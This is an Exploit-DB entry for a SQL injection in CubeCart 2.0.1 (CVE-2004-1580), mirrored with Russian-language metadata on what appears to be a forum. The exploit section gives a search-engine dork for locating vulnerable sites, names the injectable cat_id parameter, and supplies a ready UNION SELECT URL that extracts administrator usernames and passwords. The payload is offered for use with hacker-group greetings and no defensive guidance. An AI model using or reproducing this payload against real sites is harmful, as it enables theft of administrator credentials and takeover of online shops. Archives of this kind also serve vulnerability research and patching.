- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 15278
- Проверка EDB
-
- Пройдено
- Автор
- X_AVIATIQUE_X
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2004-1580
- Дата публикации
- 2010-10-18
Код:
===================================================================
CubeCart 2.0.1 SqL InjECti0N
===================================================================
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : X_AviaTique_X fr0m OS-TEAM
[~] Contact : [email protected]
[+] Greats T0: YasMouh , M.K , ArGon HaCKer , Shabah-DZ ,amgad noor
and all members 0f www.DzHacker.Net
[~] Site: www.DzHaCkEr.NeT
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : CubeCart 2.0.1
~Version : 2.0.1
~Software: http://www.cubecart.com/
~Vulnerability Style : SQL Injection
~Google Keyword : "Powered by CubeCart 2.0.1"
~String : '
[~]Date : "18.10.2010"
[~]Tested on : (L):Unix, (R):5.0.32-Debian
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~ Explotation ~~~~~~~~~~~
String (') SQL Injection Attack..
http://www.exemple.com/cart/index.php?cat_id=19' {SQL Injection}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~ Exemples ~~~~~~~~~~~
http://www.exemple.com/cart/index.php?cat_id=19+union+select+group_concat%28username,0x3a,password%29,2,3,4,5,6,7,8+from+cube305_CubeCart_admin_users--
================================
GoodLUCK.
- Источник
- www.exploit-db.com